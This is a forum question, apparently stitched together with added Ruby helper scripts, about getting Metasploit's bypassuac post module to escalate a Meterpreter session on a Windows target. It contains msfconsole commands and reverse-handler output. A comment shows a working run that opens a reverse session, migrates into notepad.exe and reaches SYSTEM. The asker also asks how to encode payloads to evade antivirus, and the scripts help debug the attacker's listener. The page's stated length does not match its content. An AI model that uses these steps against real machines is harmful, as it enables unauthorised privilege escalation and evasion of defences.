metasploit: bypassuac Windows privilege escalation hangs

Published 2025-01-03 23:18:20 · 913 characters · 7 views · 0 comments


post/windows/escalate/bypassuac seems to fail for me

For some reason I can't get the post exploitation module bypassuac to work.
This is what I did:

  1. Opened a meterpreter session on the target machine (as the NETWORKSERVICE user)
  2. Put the session in background
  3. Tried to use the post exploitation module like this:

    use post/windows/escalate/bypassuac
    set SESSION 1
    set LHOST 192.168.1.100
    set LPORT 4444
    exploit

  4. The port is not used yet so should be fine.

  5. The output is as follows:

    [-] Handler failed to bind to 192.168.1.100:4444
    [*] Started reverse handler on 0.0.0.0:4444
    [*] Starting the payload handler...
    [*] Uploading the bypass UAC executable to the filesystem...
    [*] Meterpreter stager executable 73802 bytes long being uploaded..
    [*] Uploaded the agent to the filesystem....
    [*] Post module execution completed

  6. Then it returns to the console and does nothing, no new session, nothing whatsoever.

I checked the following things:

  1. Uploading the executable bypassuac-x86.exe manually to the target. That worked perfectly fine.
  2. Checked whether the virus scanner's alarm bells rang because of the executable. They didn't.

Is there a way of manually running the executable, and could someone explain to me how that would work to open a new meterpreter session with SYSTEM-level access?

Or can I somehow encode the payload and use my custom template to evade all antivirus possibilities? I haven't found any option to encode post-exploitation modules yet.

Thanks in advance

Halvar
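The run above opens with `[-] Handler failed to bind to 192.168.1.100:4444`, after which Metasploit falls back to `0.0.0.0:4444`. The Ruby script below is an added example, not part of the question and not Metasploit's own code: it attempts the same TCP bind a reverse handler makes on LHOST:LPORT, releases it, and reports why the bind failed, so LHOST and LPORT can be corrected before the module uploads anything to the target. The default address and port are the asker's values, used only as placeholders.

```ruby
# Added example (not Metasploit code): pre-flight check for the reverse handler
# that post/windows/escalate/bypassuac starts on LHOST:LPORT. Metasploit prints
# "[-] Handler failed to bind to LHOST:LPORT" and falls back to 0.0.0.0 when the
# bind fails; this reproduces the bind attempt up front and classifies the error.
require 'socket'

# Binds a listening socket exactly as a handler would, closes it at once, and
# returns one of:
#   :ok           - LHOST is a local address and LPORT is free
#   :not_local    - LHOST is not assigned to any interface on this host
#   :unresolvable - LHOST is a name that does not resolve
#   :in_use       - something already listens on LHOST:LPORT
#   :permission   - binding needs more privilege (ports < 1024 as non-root)
def handler_bind_check(host, port)
  srv = TCPServer.new(host, port)
  srv.close
  :ok
rescue Errno::EADDRNOTAVAIL
  :not_local
rescue SocketError
  :unresolvable
rescue Errno::EADDRINUSE
  :in_use
rescue Errno::EACCES
  :permission
end

# Operator-facing advice keyed on the result above.
ADVICE = {
  ok:           'handler can bind; LHOST/LPORT look right',
  not_local:    'LHOST is not one of this host\'s addresses; pick an address the target can reach',
  unresolvable: 'LHOST does not resolve; use an IP address',
  in_use:       'LPORT is already bound (a leftover multi/handler?); run `jobs -K` in msfconsole or pick another port',
  permission:   'LPORT is privileged; use a port >= 1024 or run msfconsole with enough rights',
}.freeze

# Returns a one-line report for the given LHOST/LPORT pair.
def preflight(host, port)
  result = handler_bind_check(host, port)
  "#{host}:#{port} -> #{result}: #{ADVICE[result]}"
end

if $PROGRAM_NAME == __FILE__
  lhost = ARGV[0] || '192.168.1.100'   # placeholders taken from the question
  lport = (ARGV[1] || '4444').to_i
  puts preflight(lhost, lport)
end
```

Run it as `ruby preflight.rb 192.168.1.100 4444` on the attacker box before `exploit`; a `:not_local` result means the address in LHOST is not configured on that box, which is the usual cause of the bind failure seen in the question.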


Comments (1)

风苍溪 2025-01-10 23:18:20
msf exploit(handler) > use post/windows/escalate/bypassuac
msf post(bypassuac) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     no        Host
   RPORT    4444             no        Port
   SESSION                   yes       The session to run this module on.

msf post(bypassuac) > set SESSION 1
SESSION => 1
msf post(bypassuac) > exploit

[*] Started reverse handler on 192.168.1.100:4444
[*] Starting the payload handler...
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Uploaded the agent to the filesystem....
[*] Executing the agent with endpoint 192.168.1.100:4444 with UACBypass in effect...
[*] Post module execution completed
msf post(bypassuac) >
[*] Sending stage (749056 bytes) to 192.168.1.100
[*] Meterpreter session 2 opened (192.168.1.100:4444 -> 192.168.1.102:1565) at Thu Jan 06 12:41:13 -0500 2011
[*] Session ID 2 (192.168.1.100:4444 -> 192.168.1.102:1565) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: zuWlXDpYlOMM.exe (2640)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 3276
[*] New server process: notepad.exe (3276)

msf post(bypassuac) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getsystem
...got system (via technique 1).
meterpreter > sysinfo
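The comment's transcript differs from the one in the question at two points: the handler binds to 192.168.1.100:4444 directly, and an `Executing the agent with endpoint ... with UACBypass in effect` line follows the upload before session 2 opens and `getsystem` succeeds. The Ruby script below is an added example, not Metasploit code: it scans an msfconsole transcript for the module's milestones in the order the module prints them and reports the last stage reached, so a run that ends in `Post module execution completed` with no session can be localized to the step where it stopped. The two transcripts embedded in it are constructed from the question and the comment on this page.

```ruby
# Added example (not Metasploit code): triage of an msfconsole transcript from
# post/windows/escalate/bypassuac. Milestones are listed in the order the module
# prints them; the diagnosis names the last one reached and what is missing.

MILESTONES = [
  [:handler_bind_failed, /\[-\] Handler failed to bind to (\S+)/],
  [:handler_started,     /Started reverse handler on (\S+)/],
  [:bypassuac_uploaded,  /Uploading the bypass UAC executable/],
  [:stager_uploaded,     /Meterpreter stager executable (\d+) bytes/],
  [:agent_uploaded,      /Uploaded the agent to the filesystem/],
  [:agent_executed,      /Executing the agent with endpoint (\S+)/],
  [:module_completed,    /Post module execution completed/],
  [:stage_sent,          /Sending stage \((\d+) bytes\)/],
  [:session_opened,      /Meterpreter session (\d+) opened/],
  [:got_system,          /got system \(via technique (\d+)\)/],
].freeze

# Returns {milestone => captured value, or true when the line has no capture}
# for every milestone whose line appears in the transcript.
def scan_transcript(text)
  seen = {}
  MILESTONES.each do |name, re|
    m = text.match(re)
    next unless m
    seen[name] = m[1] || true
  end
  seen
end

# Returns a one-line diagnosis of the run.
def diagnose(text)
  seen = scan_transcript(text)
  return 'no bypassuac output recognised' if seen.empty?
  if seen[:session_opened]
    outcome = seen[:got_system] ? "getsystem succeeded (technique #{seen[:got_system]})" : 'getsystem not run'
    return "session #{seen[:session_opened]} opened; #{outcome}"
  end
  # "Post module execution completed" is printed even on a failed run, so it
  # does not count as progress when locating where the run stopped.
  progress = MILESTONES.map(&:first) - [:module_completed]
  last = progress.select { |n| seen[n] }.last
  notes = []
  if seen[:handler_bind_failed]
    notes << "handler fell back to #{seen[:handler_started]} after failing to bind #{seen[:handler_bind_failed]}"
  end
  if seen[:agent_uploaded] && !seen[:agent_executed]
    notes << "no 'Executing the agent' line: the module stopped before launching the agent"
  end
  msg = "no session; last milestone: #{last}"
  notes.empty? ? msg : "#{msg} (#{notes.join('; ')})"
end

# Constructed from the question's output (failing run).
ASKER_RUN = <<~RUN
  [-] Handler failed to bind to 192.168.1.100:4444
  [*] Started reverse handler on 0.0.0.0:4444
  [*] Starting the payload handler...
  [*] Uploading the bypass UAC executable to the filesystem...
  [*] Meterpreter stager executable 73802 bytes long being uploaded..
  [*] Uploaded the agent to the filesystem....
  [*] Post module execution completed
RUN

# Constructed from the comment's output (working run).
ANSWER_RUN = <<~RUN
  [*] Started reverse handler on 192.168.1.100:4444
  [*] Starting the payload handler...
  [*] Uploading the bypass UAC executable to the filesystem...
  [*] Meterpreter stager executable 73802 bytes long being uploaded..
  [*] Uploaded the agent to the filesystem....
  [*] Executing the agent with endpoint 192.168.1.100:4444 with UACBypass in effect...
  [*] Post module execution completed
  [*] Sending stage (749056 bytes) to 192.168.1.100
  [*] Meterpreter session 2 opened (192.168.1.100:4444 -> 192.168.1.102:1565) at Thu Jan 06 12:41:13 -0500 2011
  meterpreter > getsystem
  ...got system (via technique 1).
RUN

if $PROGRAM_NAME == __FILE__
  puts "question: #{diagnose(ASKER_RUN)}"
  puts "comment:  #{diagnose(ANSWER_RUN)}"
end
```

For the question's transcript the diagnosis stops at `agent_uploaded` and notes both the fallback to 0.0.0.0:4444 and the absent `Executing the agent` line; for the comment's transcript it reports session 2 and a successful getsystem.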